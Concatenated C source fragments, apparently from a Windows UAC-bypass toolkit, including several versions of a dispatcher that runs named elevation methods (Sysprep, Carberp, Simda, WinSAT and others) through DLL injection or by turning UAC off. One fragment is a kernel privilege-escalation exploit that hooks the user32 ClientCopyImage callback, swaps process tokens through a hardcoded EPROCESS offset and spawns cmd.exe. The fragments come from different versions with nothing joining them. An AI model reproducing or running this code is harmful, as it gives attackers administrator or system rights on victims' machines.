/* * ucmInit * * Purpose: * * Prestart phase. * */ UINT ucmInit( VOID ) { //fill common data block RtlSecureZeroMemory(&g_ldp, sizeof(g_ldp)); //remember dll handles g_ldp.hKernel32 = GetModuleHandleW(L"kernel32.dll"); if (g_ldp.hKernel32 == NULL) { return ERROR_INVALID_HANDLE; } g_ldp.hOle32 = GetModuleHandleW(L"ole32.dll"); if (g_ldp.hOle32 == NULL) { g_ldp.hOle32 = LoadLibraryW(L"ole32.dll"); if (g_ldp.hOle32 == NULL) { return ERROR_INVALID_HANDLE; } } g_ldp.hShell32 = GetModuleHandleW(L"shell32.dll"); if (g_ldp.hShell32 == NULL) { g_ldp.hShell32 = LoadLibraryW(L"shell32.dll"); if (g_ldp.hShell32 == NULL) { return ERROR_INVALID_HANDLE; } } //query basic directories if (GetSystemDirectoryW(g_ldp.szSystemDirectory, MAX_PATH) == 0) { return ERROR_INVALID_DATA; } //query build number RtlSecureZeroMemory(&g_ldp.osver, sizeof(g_ldp.osver)); g_ldp.osver.dwOSVersionInfoSize = sizeof(g_ldp.osver); if (!NT_SUCCESS(RtlGetVersion(&g_ldp.osver))) { return ERROR_INVALID_ACCESS; } g_ldp.IsWow64 = supIsProcess32bit(GetCurrentProcess()); return ERROR_SUCCESS; }
/* * main * * Purpose: * * Program entry point. * */ void main() { PTEB teb = NtCurrentTeb(); PPEB peb = teb->ProcessEnvironmentBlock; WNDCLASSEX wincls; HINSTANCE hinst = GetModuleHandle(NULL); BOOL rv = TRUE; MSG msg1; ATOM class_atom; HWND MainWindow; DWORD prot; OSVERSIONINFOW osver; DWORD cch; TCHAR cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1]; STARTUPINFO startupInfo; PROCESS_INFORMATION processInfo; RtlSecureZeroMemory(&osver, sizeof(osver)); osver.dwOSVersionInfoSize = sizeof(osver); RtlGetVersion(&osver); if (osver.dwBuildNumber > 7601) { ExitProcess((UINT)-1); return; } if (supIsProcess32bit(GetCurrentProcess())) { ExitProcess((UINT)-2); return; } g_OurPID = GetCurrentProcessId(); g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId(); #ifdef _WIN64 g_EPROCESS_TokenOffset = 0x208; #else g_EPROCESS_TokenOffset = 0xF8; #endif if (g_PsLookupProcessByProcessIdPtr == NULL) { ExitProcess((UINT)-3); return; } RtlSecureZeroMemory(&wincls, sizeof(wincls)); wincls.cbSize = sizeof(WNDCLASSEX); wincls.lpfnWndProc = &MainWindowProc; wincls.hIcon = LoadIcon(NULL, IDI_APPLICATION); wincls.lpszClassName = MAINWINDOWCLASSNAME; class_atom = RegisterClassEx(&wincls); while (class_atom) { g_w32theadinfo = teb->Win32ThreadInfo; g_ppCCI = &((PVOID *)peb->KernelCallbackTable)[0x36]; // <--- User32_ClientCopyImage INDEX if (!VirtualProtect(g_ppCCI, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &prot)) { break; } g_originalCCI = InterlockedExchangePointer(g_ppCCI, &hookCCI); MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom), NULL, 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL); if (g_shellCalled == 1) { RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo)); RtlSecureZeroMemory(&processInfo, sizeof(processInfo)); startupInfo.cb = sizeof(startupInfo); GetStartupInfo(&startupInfo); RtlSecureZeroMemory(sysdir, sizeof(sysdir)); cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH); if ((cch != 0) && (cch < MAX_PATH)) { RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf)); _strcpy(cmdbuf, sysdir); _strcat(cmdbuf, TEXT("cmd.exe")); if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL, sysdir, &startupInfo, &processInfo)) { CloseHandle(processInfo.hProcess); CloseHandle(processInfo.hThread); } } } else { OutputDebugString(TEXT(" Failed \r\n")); } if (!MainWindow) break; do { rv = GetMessage(&msg1, NULL, 0, 0); if (rv == -1) break; TranslateMessage(&msg1); DispatchMessage(&msg1); } while (rv != 0); break; } if (class_atom) UnregisterClass(MAKEINTATOM(class_atom), hinst); ExitProcess(0); }
/* * main * * Purpose: * * Program entry point. * */ VOID main() { BOOL IsWow64 = FALSE; DWORD bytesIO, dwType; WCHAR szBuffer[MAX_PATH + 1]; TOKEN_ELEVATION_TYPE ElevType; RTL_OSVERSIONINFOW osver; //verify system version RtlSecureZeroMemory(&osver, sizeof(osver)); osver.dwOSVersionInfoSize = sizeof(osver); RtlGetVersion(&osver); if (osver.dwBuildNumber < 7000) { MessageBox(GetDesktopWindow(), TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } ElevType = TokenElevationTypeDefault; if (!supGetElevationType(&ElevType)) { goto Done; } if (ElevType != TokenElevationTypeLimited) { MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } IsWow64 = supIsProcess32bit(GetCurrentProcess()); dwType = 0; bytesIO = 0; RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) { if (lstrcmpi(szBuffer, TEXT("1")) == 0) { OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r")); dwType = METHOD_SYSPREP; } if (lstrcmpi(szBuffer, TEXT("2")) == 0) { OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r")); dwType = METHOD_SYSPREP_EX; } if (lstrcmpi(szBuffer, TEXT("3")) == 0) { OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r")); dwType = METHOD_OOBE; } #ifndef _WIN64 if (lstrcmpi(szBuffer, TEXT("4")) == 0) { OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r")); dwType = METHOD_APPCOMPAT; } #endif if (lstrcmpi(szBuffer, TEXT("5")) == 0) { OutputDebugString(TEXT("[UCM] Method Simda selected\n\r")); dwType = METHOD_SIMDA; } if (lstrcmpi(szBuffer, TEXT("6")) == 0) { OutputDebugString(TEXT("[UCM] Method Carberp selected\n\r")); dwType = METHOD_CARBERP; } if (lstrcmpi(szBuffer, TEXT("7")) == 0) { OutputDebugString(TEXT("[UCM] Method Carberp_ex selected\n\r")); dwType = METHOD_CARBERP_EX; } } if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) { MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } switch (dwType) { case METHOD_SYSPREP: case METHOD_SYSPREP_EX: case METHOD_OOBE: // // Since we are using injection and not using heavens gate, we should ban usage under wow64. // #ifndef _DEBUG if (IsWow64) { MessageBoxW(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r")); } break; // // There is no RedirectEXE for x64. // #ifndef _WIN64 case METHOD_APPCOMPAT: if (ucmAppcompatElevation()) { OutputDebugString(TEXT("[UCM] AppCompat method called\n\r")); } break; #endif case METHOD_SIMDA: // // Since we are using injection and not using heavens gate, we should ban usage under wow64. // #ifndef _DEBUG if (IsWow64) { MessageBoxW(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) { if (ucmSimdaTurnOffUac()) { OutputDebugString(TEXT("[UCM] Simda method called\n\r")); } } break; case METHOD_CARBERP: case METHOD_CARBERP_EX: if (dwType == METHOD_CARBERP) { if (osver.dwBuildNumber > 9600) { MessageBoxW(GetDesktopWindow(), TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } //there is no migmiz in syswow64 in 8+ if ((IsWow64) && (osver.dwBuildNumber > 7601)) { MessageBoxW(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } } if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Carberp method called\n\r")); } break; } Done: ExitProcess(0); }
/* * main * * Purpose: * * Program entry point. * */ VOID main() { BOOL IsWow64 = FALSE; DWORD bytesIO, dwType; WCHAR *p; WCHAR szBuffer[MAX_PATH + 1]; TOKEN_ELEVATION_TYPE ElevType; RTL_OSVERSIONINFOW osver; //verify system version RtlSecureZeroMemory(&osver, sizeof(osver)); osver.dwOSVersionInfoSize = sizeof(osver); RtlGetVersion(&osver); if (osver.dwBuildNumber < 7000) { MessageBox(GetDesktopWindow(), TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } ElevType = TokenElevationTypeDefault; if (!supGetElevationType(&ElevType)) { goto Done; } if (ElevType != TokenElevationTypeLimited) { MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } IsWow64 = supIsProcess32bit(GetCurrentProcess()); dwType = 0; bytesIO = 0; RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) { dwType = strtoul(szBuffer); switch (dwType) { case METHOD_SYSPREP: OutputDebugString(TEXT("[UCM] Sysprep\n\r")); if (osver.dwBuildNumber > 9200) { MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } break; case METHOD_SYSPREP_EX: OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r")); if (osver.dwBuildNumber < 9600) { MessageBox(GetDesktopWindow(), WINBLUEONLY, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } break; case METHOD_OOBE: OutputDebugString(TEXT("[UCM] Oobe\n\r")); break; case METHOD_REDIRECTEXE: OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r")); #ifdef _WIN64 MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; #endif break; case METHOD_SIMDA: OutputDebugString(TEXT("[UCM] Simda\n\r")); break; case METHOD_CARBERP: OutputDebugString(TEXT("[UCM] Carberp\n\r")); break; case METHOD_CARBERP_EX: OutputDebugString(TEXT("[UCM] Carberp_ex\n\r")); break; case METHOD_TILON: OutputDebugString(TEXT("[UCM] Tilon\n\r")); if (osver.dwBuildNumber > 9200) { MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } break; case METHOD_AVRF: OutputDebugString(TEXT("[UCM] AVrf\n\r")); break; case METHOD_WINSAT: OutputDebugString(TEXT("[UCM] WinSAT\n\r")); break; case METHOD_SHIMPATCH: OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r")); #ifdef _WIN64 MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; #endif break; } } switch (dwType) { case METHOD_SYSPREP: case METHOD_SYSPREP_EX: case METHOD_OOBE: case METHOD_TILON: // // Since we are using injection and not using heavens gate, we should ban usage under wow64. // #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r")); } break; // // Allow only in 32 version. // #ifndef _WIN64 case METHOD_REDIRECTEXE: case METHOD_SHIMPATCH: if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] AppCompat method called\n\r")); } break; #endif case METHOD_SIMDA: // // Since we are using injection and not using heavens gate, we should ban usage under wow64. // #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) { if (ucmSimdaTurnOffUac()) { OutputDebugString(TEXT("[UCM] Simda method called\n\r")); } } break; case METHOD_CARBERP: case METHOD_CARBERP_EX: if (dwType == METHOD_CARBERP) { if (osver.dwBuildNumber > 9600) { MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } //there is no migmiz in syswow64 in 8+ if ((IsWow64) && (osver.dwBuildNumber > 7601)) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } } if (dwType == METHOD_CARBERP_EX) { #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif } if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Carberp method called\n\r")); } break; case METHOD_AVRF: #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) { OutputDebugString(TEXT("[UCM] AVrf method called\n\r")); } break; case METHOD_WINSAT: // // Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool. // if (IsWow64) { MessageBox(GetDesktopWindow(), TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } if (osver.dwBuildNumber < 9200) { p = L"powrprof.dll"; } else { p = L"devobj.dll"; } if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] WinSAT method called\n\r")); } break; } Done: ExitProcess(0); }